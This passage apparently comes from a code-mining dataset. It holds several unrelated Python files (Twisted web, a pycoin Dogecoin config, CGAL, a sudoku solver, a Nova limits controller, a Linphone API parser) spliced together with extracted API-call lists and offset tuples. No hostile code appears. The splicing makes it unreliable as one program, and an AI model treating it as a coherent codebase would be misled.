return logfile.LogFile(os.path.basename(path), os.path.dirname(path)) def __getstate__(self): d = self.__dict__.copy() d["sessions"] = {} return d def _mkuid(self): """ (internal) Generate an opaque, unique ID for a user's session. """ self.counter = self.counter + 1 return hexlify(self._entropy(32)) def makeSession(self): """ Generate a new Session instance, and store it for future reference. """ uid = self._mkuid() session = self.sessions[uid] = self.sessionFactory(self, uid) session.startCheckingExpiration() return session def getSession(self, uid): """ Get a previously generated session. @param uid: Unique ID of the session. @type uid: L{bytes}. @raise KeyError: If the session is not found. """ return self.sessions[uid] def buildProtocol(self, addr): """ Generate a channel attached to this site. """ channel = super().buildProtocol(addr) channel.requestFactory = self.requestFactory channel.site = self return channel isLeaf = 0 def render(self, request): """ Redirect because a Site is always a directory. """ request.redirect(request.prePathURL() + b"/") request.finish() def getChildWithDefault(self, pathEl, request): """ Emulate a resource's getChild method. """ request.site = self return self.resource.getChildWithDefault(pathEl, request) def getResourceFor(self, request): """ Get a resource for a request. This iterates through the resource hierarchy, calling getChildWithDefault on each resource it finds for a path element, stopping when it hits an element where isLeaf is true. """ request.site = self # Sitepath is used to determine cookie names between distributed # servers and disconnected sites. request.sitepath = copy.copy(request.prepath) return resource.getChildForRequest(self.resource, request) # IProtocolNegotiationFactory def acceptableProtocols(self): """ Protocols this server can speak. """ baseProtocols = [b"http/1.1"] if http.H2_ENABLED: baseProtocols.insert(0, b"h2") return baseProtocols
[ "twisted.python.components.Componentized.__init__", "twisted.python.urlpath.URLPath.fromRequest", "re.compile", "twisted.logger.Logger", "twisted.web.resource.getChildForRequest", "twisted.web.http.Request.gotLength", "copy.copy", "zlib.compressobj", "twisted.web.resource._IEncodingResource.providedBy", "twisted.spread.pb.ViewPoint", "incremental.Version", "os.path.dirname", "twisted.python.failure.Failure", "twisted.python.compat.nativeString", "twisted.python.reflect.safe_repr", "twisted.web.http.Request.finish", "twisted.web.resource.ErrorPage", "zope.interface.implementer", "twisted.web.http.datetimeToString", "twisted.python.compat.networkString", "twisted.web.http.Request.__init__", "os.path.basename", "twisted.web.util.formatFailure", "twisted.web.http.Request.write" ]
[((2482, 2508), 'zope.interface.implementer', 'implementer', (['iweb.IRequest'], {}), '(iweb.IRequest)\n', (2493, 2508), False, 'from zope.interface import implementer\n'), ((20318, 20359), 'zope.interface.implementer', 'implementer', (['iweb._IRequestEncoderFactory'], {}), '(iweb._IRequestEncoderFactory)\n', (20329, 20359), False, 'from zope.interface import implementer\n'), ((21320, 21354), 'zope.interface.implementer', 'implementer', (['iweb._IRequestEncoder'], {}), '(iweb._IRequestEncoder)\n', (21331, 21354), False, 'from zope.interface import implementer\n'), ((25192, 25240), 'twisted.python.compat.networkString', 'networkString', (['f"""TwistedWeb/{copyright.version}"""'], {}), "(f'TwistedWeb/{copyright.version}')\n", (25205, 25240), False, 'from twisted.python.compat import networkString, nativeString\n'), ((25244, 25295), 'zope.interface.implementer', 'implementer', (['interfaces.IProtocolNegotiationFactory'], {}), '(interfaces.IProtocolNegotiationFactory)\n', (25255, 25295), False, 'from zope.interface import implementer\n'), ((1605, 1633), 'incremental.Version', 'Version', (['"""Twisted"""', '(12)', '(1)', '(0)'], {}), "('Twisted', 12, 1, 0)\n", (1612, 1633), False, 'from incremental import Version\n'), ((1778, 1806), 'incremental.Version', 'Version', (['"""Twisted"""', '(12)', '(1)', '(0)'], {}), "('Twisted', 12, 1, 0)\n", (1785, 1806), False, 'from incremental import Version\n'), ((3294, 3302), 'twisted.logger.Logger', 'Logger', ([], {}), '()\n', (3300, 3302), False, 'from twisted.logger import Logger\n'), ((20546, 20589), 're.compile', 're.compile', (["b'(:?^|[\\\\s,])gzip(:?$|[\\\\s,])'"], {}), "(b'(:?^|[\\\\s,])gzip(:?$|[\\\\s,])')\n", (20556, 20589), False, 'import re\n'), ((3349, 3389), 'twisted.web.http.Request.__init__', 'http.Request.__init__', (['self', '*args'], {}), '(self, *args, **kw)\n', (3370, 3389), False, 'from twisted.web import iweb, http, util\n'), ((3398, 3437), 'twisted.python.components.Componentized.__init__', 'components.Componentized.__init__', (['self'], {}), '(self)\n', (3431, 3437), False, 'from twisted.python import reflect, failure, components\n'), ((3802, 3825), 'twisted.spread.pb.ViewPoint', 'ViewPoint', (['issuer', 'self'], {}), '(issuer, self)\n', (3811, 3825), False, 'from twisted.spread.pb import Copyable, ViewPoint\n'), ((8744, 8769), 'twisted.web.http.Request.finish', 'http.Request.finish', (['self'], {}), '(self)\n', (8763, 8769), False, 'from twisted.web import iweb, http, util\n'), ((19036, 19069), 'twisted.python.urlpath.URLPath.fromRequest', 'urlpath.URLPath.fromRequest', (['self'], {}), '(self)\n', (19063, 19069), False, 'from twisted.python import urlpath\n'), ((21708, 21775), 'zlib.compressobj', 'zlib.compressobj', (['compressLevel', 'zlib.DEFLATED', '(16 + zlib.MAX_WBITS)'], {}), '(compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS)\n', (21724, 21775), False, 'import zlib\n'), ((29168, 29194), 'copy.copy', 'copy.copy', (['request.prepath'], {}), '(request.prepath)\n', (29177, 29194), False, 'import copy\n'), ((29210, 29261), 'twisted.web.resource.getChildForRequest', 'resource.getChildForRequest', (['self.resource', 'request'], {}), '(self.resource, request)\n', (29237, 29261), False, 'from twisted.web import resource\n'), ((6104, 6127), 'twisted.web.http.datetimeToString', 'http.datetimeToString', ([], {}), '()\n', (6125, 6127), False, 'from twisted.web import iweb, http, util\n'), ((6477, 6522), 'twisted.web.resource._IEncodingResource.providedBy', 'resource._IEncodingResource.providedBy', (['resrc'], {}), '(resrc)\n', (6515, 
6522), False, 'from twisted.web import resource\n'), ((8452, 8482), 'twisted.web.http.Request.write', 'http.Request.write', (['self', 'data'], {}), '(self, data)\n', (8470, 8482), False, 'from twisted.web import iweb, http, util\n'), ((27104, 27126), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (27120, 27126), False, 'import os\n'), ((27128, 27149), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (27143, 27149), False, 'import os\n'), ((5578, 5614), 'twisted.web.http.Request.gotLength', 'http.Request.gotLength', (['self', 'length'], {}), '(self, length)\n', (5600, 5614), False, 'from twisted.web import iweb, http, util\n'), ((8698, 8728), 'twisted.web.http.Request.write', 'http.Request.write', (['self', 'data'], {}), '(self, data)\n', (8716, 8728), False, 'from twisted.web import iweb, http, util\n'), ((6752, 6769), 'twisted.python.failure.Failure', 'failure.Failure', ([], {}), '()\n', (6767, 6769), False, 'from twisted.python import reflect, failure, components\n'), ((11281, 11342), 'twisted.web.resource.ErrorPage', 'resource.ErrorPage', (['http.NOT_ALLOWED', '"""Method Not Allowed"""', 's'], {}), "(http.NOT_ALLOWED, 'Method Not Allowed', s)\n", (11299, 11342), False, 'from twisted.web import resource\n'), ((13642, 13668), 'twisted.web.util.formatFailure', 'util.formatFailure', (['reason'], {}), '(reason)\n', (13660, 13668), False, 'from twisted.web import iweb, http, util\n'), ((11024, 11049), 'twisted.python.compat.nativeString', 'nativeString', (['self.method'], {}), '(self.method)\n', (11036, 11049), False, 'from twisted.python.compat import networkString, nativeString\n'), ((10965, 10987), 'twisted.python.compat.nativeString', 'nativeString', (['self.uri'], {}), '(self.uri)\n', (10977, 10987), False, 'from twisted.python.compat import networkString, nativeString\n'), ((12242, 12265), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['body'], {}), '(body)\n', (12259, 12265), False, 'from twisted.python import reflect, failure, components\n'), ((11174, 11189), 'twisted.python.compat.nativeString', 'nativeString', (['x'], {}), '(x)\n', (11186, 11189), False, 'from twisted.python.compat import networkString, nativeString\n'), ((12133, 12157), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['resrc'], {}), '(resrc)\n', (12150, 12157), False, 'from twisted.python import reflect, failure, components\n'), ((12022, 12045), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['self'], {}), '(self)\n', (12039, 12045), False, 'from twisted.python import reflect, failure, components\n')]
from pycoin.networks.bitcoinish import create_bitcoinish_network

network = create_bitcoinish_network(
    symbol="DOGE", network_name="Dogecoin", subnet_name="mainnet",
    wif_prefix_hex="9e", address_prefix_hex="1e", pay_to_script_prefix_hex="16",
    bip32_prv_prefix_hex="<KEY>", bip32_pub_prefix_hex="<KEY>")
[ "pycoin.networks.bitcoinish.create_bitcoinish_network" ]
[((76, 313), 'pycoin.networks.bitcoinish.create_bitcoinish_network', 'create_bitcoinish_network', ([], {'symbol': '"""DOGE"""', 'network_name': '"""Dogecoin"""', 'subnet_name': '"""mainnet"""', 'wif_prefix_hex': '"""9e"""', 'address_prefix_hex': '"""1e"""', 'pay_to_script_prefix_hex': '"""16"""', 'bip32_prv_prefix_hex': '"""<KEY>"""', 'bip32_pub_prefix_hex': '"""<KEY>"""'}), "(symbol='DOGE', network_name='Dogecoin',\n subnet_name='mainnet', wif_prefix_hex='9e', address_prefix_hex='1e',\n pay_to_script_prefix_hex='16', bip32_prv_prefix_hex='<KEY>',\n bip32_pub_prefix_hex='<KEY>')\n", (101, 313), False, 'from pycoin.networks.bitcoinish import create_bitcoinish_network\n')]
import logging

from grpc_health.v1 import health_pb2, health_pb2_grpc
from grpc_health.v1.health import HealthServicer

from needlestack.apis import servicers_pb2_grpc
from needlestack.servicers import factory
from needlestack.servicers.merger import MergerServicer

from examples import configs

logging.getLogger("kazoo").setLevel("WARN")


def main():
    config = configs.LocalDockerConfig()

    server = factory.create_server(config)
    manager = factory.create_zookeeper_cluster_manager(config)
    manager.startup()

    servicers_pb2_grpc.add_MergerServicer_to_server(MergerServicer(config, manager), server)

    health = HealthServicer()
    health_pb2_grpc.add_HealthServicer_to_server(health, server)
    health.set("Merger", health_pb2.HealthCheckResponse.SERVING)

    factory.serve(server)


if __name__ == "__main__":
    main()
[ "examples.configs.LocalDockerConfig", "logging.getLogger", "needlestack.servicers.factory.create_zookeeper_cluster_manager", "needlestack.servicers.merger.MergerServicer", "grpc_health.v1.health.HealthServicer", "needlestack.servicers.factory.serve", "needlestack.servicers.factory.create_server", "grpc_health.v1.health_pb2_grpc.add_HealthServicer_to_server" ]
[((369, 396), 'examples.configs.LocalDockerConfig', 'configs.LocalDockerConfig', ([], {}), '()\n', (394, 396), False, 'from examples import configs\n'), ((411, 440), 'needlestack.servicers.factory.create_server', 'factory.create_server', (['config'], {}), '(config)\n', (432, 440), False, 'from needlestack.servicers import factory\n'), ((455, 503), 'needlestack.servicers.factory.create_zookeeper_cluster_manager', 'factory.create_zookeeper_cluster_manager', (['config'], {}), '(config)\n', (495, 503), False, 'from needlestack.servicers import factory\n'), ((634, 650), 'grpc_health.v1.health.HealthServicer', 'HealthServicer', ([], {}), '()\n', (648, 650), False, 'from grpc_health.v1.health import HealthServicer\n'), ((655, 715), 'grpc_health.v1.health_pb2_grpc.add_HealthServicer_to_server', 'health_pb2_grpc.add_HealthServicer_to_server', (['health', 'server'], {}), '(health, server)\n', (699, 715), False, 'from grpc_health.v1 import health_pb2, health_pb2_grpc\n'), ((786, 807), 'needlestack.servicers.factory.serve', 'factory.serve', (['server'], {}), '(server)\n', (799, 807), False, 'from needlestack.servicers import factory\n'), ((298, 324), 'logging.getLogger', 'logging.getLogger', (['"""kazoo"""'], {}), "('kazoo')\n", (315, 324), False, 'import logging\n'), ((579, 610), 'needlestack.servicers.merger.MergerServicer', 'MergerServicer', (['config', 'manager'], {}), '(config, manager)\n', (593, 610), False, 'from needlestack.servicers.merger import MergerServicer\n')]
from CGAL.CGAL_Kernel import Point_2
from CGAL.CGAL_Kernel import Weighted_point_2
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2
from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2
from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2_Face_handle
from CGAL.CGAL_Alpha_shape_2 import GENERAL, EXTERIOR, SINGULAR, REGULAR, INTERIOR
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Vertex_handle
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Face_handle
from CGAL.CGAL_Alpha_shape_2 import Face_Interval_3

lst = []
lst.append(Point_2(0, 0))
lst.append(Point_2(0, 4))
lst.append(Point_2(44, 0))
lst.append(Point_2(44, 5))
lst.append(Point_2(444, 51))
lst.append(Point_2(14, 1))

t = Alpha_shape_2(lst, 0, GENERAL)
t2 = Alpha_shape_2(lst, 0)

t.clear()
t.make_alpha_shape(lst)

for d in t.alpha():
    print(d)

for v in t.finite_vertices():
    type = t.classify(v)
    print(v.get_range()[0])
    if type == INTERIOR:
        print("INTERIOR")
    elif type == SINGULAR:
        print("SINGULAR")
    elif type == REGULAR:
        print("REGULAR")
    elif type == EXTERIOR:
        print("EXTERIOR")

for f in t.finite_faces():
    i = f.get_ranges(0)
    print(i.first)
    print(i.second)
    print(i.third)

was = Weighted_alpha_shape_2()
lst_wp = []
lst_wp.append(Weighted_point_2(Point_2(0, 0), 1))
lst_wp.append(Weighted_point_2(Point_2(0, 4), 1))
lst_wp.append(Weighted_point_2(Point_2(44, 0), 1))
lst_wp.append(Weighted_point_2(Point_2(44, 5), 1))
lst_wp.append(Weighted_point_2(Point_2(444, 51), 1))
lst_wp.append(Weighted_point_2(Point_2(14, 1), 1))

was.make_alpha_shape(lst_wp)
[ "CGAL.CGAL_Kernel.Point_2", "CGAL.CGAL_Alpha_shape_2.Alpha_shape_2", "CGAL.CGAL_Alpha_shape_2.Weighted_alpha_shape_2" ]
[((702, 732), 'CGAL.CGAL_Alpha_shape_2.Alpha_shape_2', 'Alpha_shape_2', (['lst', '(0)', 'GENERAL'], {}), '(lst, 0, GENERAL)\n', (715, 732), False, 'from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2\n'), ((738, 759), 'CGAL.CGAL_Alpha_shape_2.Alpha_shape_2', 'Alpha_shape_2', (['lst', '(0)'], {}), '(lst, 0)\n', (751, 759), False, 'from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2\n'), ((1242, 1266), 'CGAL.CGAL_Alpha_shape_2.Weighted_alpha_shape_2', 'Weighted_alpha_shape_2', ([], {}), '()\n', (1264, 1266), False, 'from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2\n'), ((546, 559), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(0)'], {}), '(0, 0)\n', (553, 559), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((572, 585), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(4)'], {}), '(0, 4)\n', (579, 585), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((598, 612), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(0)'], {}), '(44, 0)\n', (605, 612), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((625, 639), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(5)'], {}), '(44, 5)\n', (632, 639), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((652, 668), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(444)', '(51)'], {}), '(444, 51)\n', (659, 668), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((681, 695), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(14)', '(1)'], {}), '(14, 1)\n', (688, 695), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1310, 1323), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(0)'], {}), '(0, 0)\n', (1317, 1323), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1360, 1373), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(4)'], {}), '(0, 4)\n', (1367, 1373), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1410, 1424), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(0)'], {}), '(44, 0)\n', (1417, 1424), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1461, 1475), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(5)'], {}), '(44, 5)\n', (1468, 1475), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1512, 1528), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(444)', '(51)'], {}), '(444, 51)\n', (1519, 1528), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1565, 1579), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(14)', '(1)'], {}), '(14, 1)\n', (1572, 1579), False, 'from CGAL.CGAL_Kernel import Point_2\n')]
import scene


class MyScene(scene.Scene):
    def setup(self):
        self.label_node = scene.LabelNode('A', position=(100,400), parent=self)
        self.start_flag = False

    def update(self):
        if self.start_flag:
            x,y = self.label_node.position
            if x < 340:
                self.label_node.position = (x+2, y)
            else:
                self.start_flag = False

    def touch_ended(self, touch):
        self.start_flag = True


scene.run(MyScene())
[ "scene.LabelNode" ]
[((91, 145), 'scene.LabelNode', 'scene.LabelNode', (['"""A"""'], {'position': '(100, 400)', 'parent': 'self'}), "('A', position=(100, 400), parent=self)\n", (106, 145), False, 'import scene\n')]
from bot.commands import BaseCommand

import mongo


class DisconnectCommand(BaseCommand):
    _COMMAND = 'disconnect'

    _DESCRIPTION = 'Close currently active chat.'

    _SUCCESS_MESSAGE = 'Disconnected from chat'

    def _callback(self, user, _bot, update, **kwargs):
        return self._call(user, _bot, update, **kwargs)

    def _call(self, user, _bot, update, **kwargs):
        chat = mongo.chats.get_active_chat_by_telegram_id(user.id)

        if chat:
            mongo.chats.disable_chat(chat['_id'])
            return True

        _bot.send_message(
            user.id,
            'You are not connected to any vk user',
        )
        return False
[ "mongo.chats.get_active_chat_by_telegram_id", "mongo.chats.disable_chat" ]
[((397, 448), 'mongo.chats.get_active_chat_by_telegram_id', 'mongo.chats.get_active_chat_by_telegram_id', (['user.id'], {}), '(user.id)\n', (439, 448), False, 'import mongo\n'), ((478, 515), 'mongo.chats.disable_chat', 'mongo.chats.disable_chat', (["chat['_id']"], {}), "(chat['_id'])\n", (502, 515), False, 'import mongo\n')]
import numpy as np

board = np.zeros(shape=(9, 9))
count = 0


def solve():
    global count
    count += 1
    if count % 1000 == 0:
        print('\rCurrent number of computations made:', count, end='')
    freePos = find()
    if freePos is None:
        return True

    i = freePos[0]
    j = freePos[1]

    for w in range(1, 10):
        if possible(w, freePos):
            board[i][j] = w
            if solve():
                return True
            board[i][j] = 0
    return False


def find():
    for i in range(9):
        for j in range(9):
            if board[i][j] == 0:
                return [i, j]
    return None


def possible(value, position):  # position = (i, j) tuple
    i = position[0]
    j = position[1]

    # checks row and column for repeat value
    if (value in board[:, j]) or (value in board[i]):
        return False

    # reset to i,j - top left square
    i = (i // 3) * 3
    j = (j // 3) * 3

    # check all squares in square
    for n in range(i, i + 3):
        for m in range(j, j + 3):
            if board[n][m] == value:
                return False
    return True


def change(position):  # position = (i, j) tuple
    i = position[0]
    j = position[1]
    for w in range(1, 10):
        if w not in board[:, j] and w not in board[i]:
            board[i][j] = w
            return True
    return False


def initialize():
    print("Please enter the values on the board starting from left to right, top to bottom, 0 for blank")
    integerChunk = input("Numbers: ")
    pos = 0
    for i in range(9):
        for j in range(9):
            board[i][j] = int(integerChunk[pos])
            pos += 1


def displayBoard():
    for i in range(3):
        for j in range(9):
            if board[i][j] == 0:
                print(" ", end="")
            else:
                print("%d " % board[i][j], end="")
            if (j == 2) or (j == 5):
                print("| ", end="")
            if j == 8:
                print("")
    print("- - - - - - - - - - -")
    for i in range(3, 6):
        for j in range(9):
            if board[i][j] == 0:
                print(" ", end="")
            else:
                print("%d " % board[i][j], end="")
            if (j == 2) or (j == 5):
                print("| ", end="")
            if j == 8:
                print("")
    print("- - - - - - - - - - -")
    for i in range(6, 9):
        for j in range(9):
            if board[i][j] == 0:
                print(" ", end="")
            else:
                print("%d " % board[i][j], end="")
            if (j == 2) or (j == 5):
                print("| ", end="")
            if j == 8:
                print("")


def main():
    initialize()
    print("Is this the correct board? Press enter to continue or 'q' to exit program.")
    displayBoard()
    response = input()
    if response == "q":
        exit()
    print("---------------SOLVING---------------\n")
    solve()
    print("\r\rSOLUTION")
    displayBoard()
    print("\nTotal number of computations:", count)


if __name__ == "__main__":
    main()
[ "numpy.zeros" ]
[((28, 50), 'numpy.zeros', 'np.zeros', ([], {'shape': '(9, 9)'}), '(shape=(9, 9))\n', (36, 50), True, 'import numpy as np\n')]
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from nova.api.openstack import api_version_request
from nova.api.openstack.api_version_request \
    import MIN_WITHOUT_PROXY_API_SUPPORT_VERSION
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.policies import used_limits as ul_policies
from nova import quota

QUOTAS = quota.QUOTAS


class UsedLimitsController(wsgi.Controller):

    @staticmethod
    def _reserved(req):
        try:
            return int(req.GET['reserved'])
        except (ValueError, KeyError):
            return False

    @wsgi.extends
    @extensions.expected_errors(())
    def index(self, req, resp_obj):
        context = req.environ['nova.context']
        project_id = self._project_id(context, req)
        quotas = QUOTAS.get_project_quotas(context, project_id, usages=True)
        if api_version_request.is_supported(
                req, min_version=MIN_WITHOUT_PROXY_API_SUPPORT_VERSION):
            quota_map = {
                'totalRAMUsed': 'ram',
                'totalCoresUsed': 'cores',
                'totalInstancesUsed': 'instances',
                'totalServerGroupsUsed': 'server_groups',
            }
        else:
            quota_map = {
                'totalRAMUsed': 'ram',
                'totalCoresUsed': 'cores',
                'totalInstancesUsed': 'instances',
                'totalFloatingIpsUsed': 'floating_ips',
                'totalSecurityGroupsUsed': 'security_groups',
                'totalServerGroupsUsed': 'server_groups',
            }

        used_limits = {}
        for display_name, key in quota_map.items():
            if key in quotas:
                reserved = (quotas[key]['reserved']
                            if self._reserved(req) else 0)
                used_limits[display_name] = quotas[key]['in_use'] + reserved

        resp_obj.obj['limits']['absolute'].update(used_limits)

    def _project_id(self, context, req):
        if 'tenant_id' in req.GET:
            tenant_id = req.GET.get('tenant_id')
            target = {
                'project_id': tenant_id,
                'user_id': context.user_id
            }
            context.can(ul_policies.BASE_POLICY_NAME, target)
            return tenant_id
        return context.project_id
[ "nova.api.openstack.extensions.expected_errors", "nova.api.openstack.api_version_request.is_supported" ]
[((1173, 1203), 'nova.api.openstack.extensions.expected_errors', 'extensions.expected_errors', (['()'], {}), '(())\n', (1199, 1203), False, 'from nova.api.openstack import extensions\n'), ((1426, 1519), 'nova.api.openstack.api_version_request.is_supported', 'api_version_request.is_supported', (['req'], {'min_version': 'MIN_WITHOUT_PROXY_API_SUPPORT_VERSION'}), '(req, min_version=\n MIN_WITHOUT_PROXY_API_SUPPORT_VERSION)\n', (1458, 1519), False, 'from nova.api.openstack import api_version_request\n')]
#!/usr/bin/python # Copyright (C) 2014 Belledonne Communications SARL # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. import argparse import os import six import string import sys import xml.etree.ElementTree as ET import xml.dom.minidom as minidom import metadoc class CObject: def __init__(self, name): self.name = name.strip() self.briefDescription = '' self.detailedDescription = None self.deprecated = False self.briefDoc = None class CEnumValue(CObject): def __init__(self, name): CObject.__init__(self, name) self.value = None class CEnum(CObject): def __init__(self, name): CObject.__init__(self, name) self.values = [] self.associatedTypedef = None def addValue(self, value): self.values.append(value) class CStructMember(CObject): def __init__(self, name, t): CObject.__init__(self, name) self.ctype = t.strip() class CStruct(CObject): def __init__(self, name): CObject.__init__(self, name) self.members = [] self.associatedTypedef = None def addMember(self, member): self.members.append(member) class CTypedef(CObject): def __init__(self, name, definition): CObject.__init__(self, name) self.definition = definition.strip() class CArgument(CObject): def __init__(self, t, name = '', enums = [], structs = []): CObject.__init__(self, name) self.description = None self.containedType = None keywords = [ 'const', 'struct', 'enum', 'signed', 'unsigned', 'short', 'long', '*' ] fullySplittedType = [] splittedType = t.strip().split(' ') for s in splittedType: if s.startswith('*'): fullySplittedType.append('*') if len(s) > 1: fullySplittedType.append(s[1:]) elif s.endswith('*'): fullySplittedType.append(s[:-1]) fullySplittedType.append('*') else: fullySplittedType.append(s) if 'MS2_DEPRECATED' in fullySplittedType: fullySplittedType.remove('MS2_DEPRECATED') elif 'LINPHONE_DEPRECATED' in fullySplittedType: fullySplittedType.remove('LINPHONE_DEPRECATED') isStruct = False isEnum = False self.ctype = 'int' # Default to int so that the result is correct eg. 
for 'unsigned short' for s in fullySplittedType: if not s in keywords: self.ctype = s if s == 'struct': isStruct = True if s == 'enum': isEnum = True if isStruct: for st in structs: if st.associatedTypedef is not None: self.ctype = st.associatedTypedef.name elif isEnum: for e in enums: if e.associatedTypedef is not None: self.ctype = e.associatedTypedef.name if self.ctype == 'int' and 'int' not in fullySplittedType: if fullySplittedType[-1] == '*': fullySplittedType.insert(-1, 'int') else: fullySplittedType.append('int') self.completeType = ' '.join(fullySplittedType) def __str__(self): return self.completeType + " " + self.name class CArgumentsList: def __init__(self): self.arguments = [] def addArgument(self, arg): self.arguments.append(arg) def __len__(self): return len(self.arguments) def __getitem__(self, key): return self.arguments[key] def __str__(self): argstr = [] for arg in self.arguments: argstr.append(str(arg)) return ', '.join(argstr) class CFunction(CObject): def __init__(self, name, returnarg, argslist): CObject.__init__(self, name) self.returnArgument = returnarg self.arguments = argslist self.location = None class CEvent(CFunction): pass class CProperty: def __init__(self, name): self.name = name self.getter = None self.setter = None class CClass(CObject): def __init__(self, st): CObject.__init__(self, st.associatedTypedef.name) if st.deprecated or st.associatedTypedef.deprecated: self.deprecated = True if len(st.associatedTypedef.briefDescription) > 0: self.briefDescription = st.associatedTypedef.briefDescription elif len(st.briefDescription) > 0: self.briefDescription = st.briefDescription if st.associatedTypedef.detailedDescription is not None: self.detailedDescription = st.associatedTypedef.detailedDescription elif st.detailedDescription is not None: self.detailedDescription = st.detailedDescription self.__struct = st self.events = {} self.classMethods = {} self.instanceMethods = {} self.properties = {} self.__computeCFunctionPrefix() def __computeCFunctionPrefix(self): self.cFunctionPrefix = '' first = True for l in self.name: if l.isupper() and not first: self.cFunctionPrefix += '_' self.cFunctionPrefix += l.lower() first = False self.cFunctionPrefix += '_' def __addPropertyGetter(self, name, f): if not name in self.properties: prop = CProperty(name) self.properties[name] = prop self.properties[name].getter = f def __addPropertySetter(self, name, f): if not name in self.properties: prop = CProperty(name) self.properties[name] = prop self.properties[name].setter = f def __addClassMethod(self, f): if not f.name in self.classMethods: self.classMethods[f.name] = f def __addInstanceMethod(self, f): name = f.name[len(self.cFunctionPrefix):] if name.startswith('get_') and len(f.arguments) == 1: self.__addPropertyGetter(name[4:], f) elif name.startswith('is_') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t': self.__addPropertyGetter(name, f) elif name.endswith('_enabled') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t': self.__addPropertyGetter(name, f) elif name.startswith('set_') and len(f.arguments) == 2: self.__addPropertySetter(name[4:], f) elif name.startswith('enable_') and len(f.arguments) == 2 and f.arguments[1].ctype == 'bool_t': self.__addPropertySetter(name[7:] + '_enabled', f) else: if not f.name in self.instanceMethods: self.instanceMethods[f.name] = f def addEvent(self, ev): if not ev.name in self.events: self.events[ev.name] = ev def addMethod(self, f): if len(f.arguments) > 0 and f.arguments[0].ctype == self.name: 
self.__addInstanceMethod(f) else: self.__addClassMethod(f) class Project: def __init__(self): self.verbose = False self.prettyPrint = False self.enums = [] self.__structs = [] self.__typedefs = [] self.__events = [] self.__functions = [] self.classes = [] self.docparser = metadoc.Parser() def add(self, elem): if isinstance(elem, CClass): if self.verbose: print("Adding class " + elem.name) self.classes.append(elem) elif isinstance(elem, CEnum): if self.verbose: print("Adding enum " + elem.name) for ev in elem.values: print("\t" + ev.name) self.enums.append(elem) elif isinstance(elem, CStruct): if self.verbose: print("Adding struct " + elem.name) for sm in elem.members: print("\t" + sm.ctype + " " + sm.name) self.__structs.append(elem) elif isinstance(elem, CTypedef): if self.verbose: print("Adding typedef " + elem.name) print("\t" + elem.definition) self.__typedefs.append(elem) elif isinstance(elem, CEvent): if self.verbose: print("Adding event " + elem.name) print("\tReturns: " + elem.returnArgument.ctype) print("\tArguments: " + str(elem.arguments)) self.__events.append(elem) elif isinstance(elem, CFunction): if self.verbose: print("Adding function " + elem.name) print("\tReturns: " + elem.returnArgument.ctype) print("\tArguments: " + str(elem.arguments)) self.__functions.append(elem) def __cleanDescription(self, descriptionNode): for para in descriptionNode.findall('./para'): for n in para.findall('./parameterlist'): para.remove(n) for n in para.findall("./simplesect[@kind='return']"): para.remove(n) for n in para.findall("./simplesect[@kind='see']"): t = ''.join(n.itertext()) n.clear() n.tag = 'see' n.text = t for n in para.findall("./simplesect[@kind='note']"): n.tag = 'note' n.attrib = {} for n in para.findall(".//xrefsect"): para.remove(n) for n in para.findall('.//ref'): n.attrib = {} for n in para.findall(".//bctbx_list"): para.remove(n) if descriptionNode.tag == 'parameterdescription': descriptionNode.tag = 'description' if descriptionNode.tag == 'simplesect': descriptionNode.tag = 'description' descriptionNode.attrib = {} return descriptionNode def 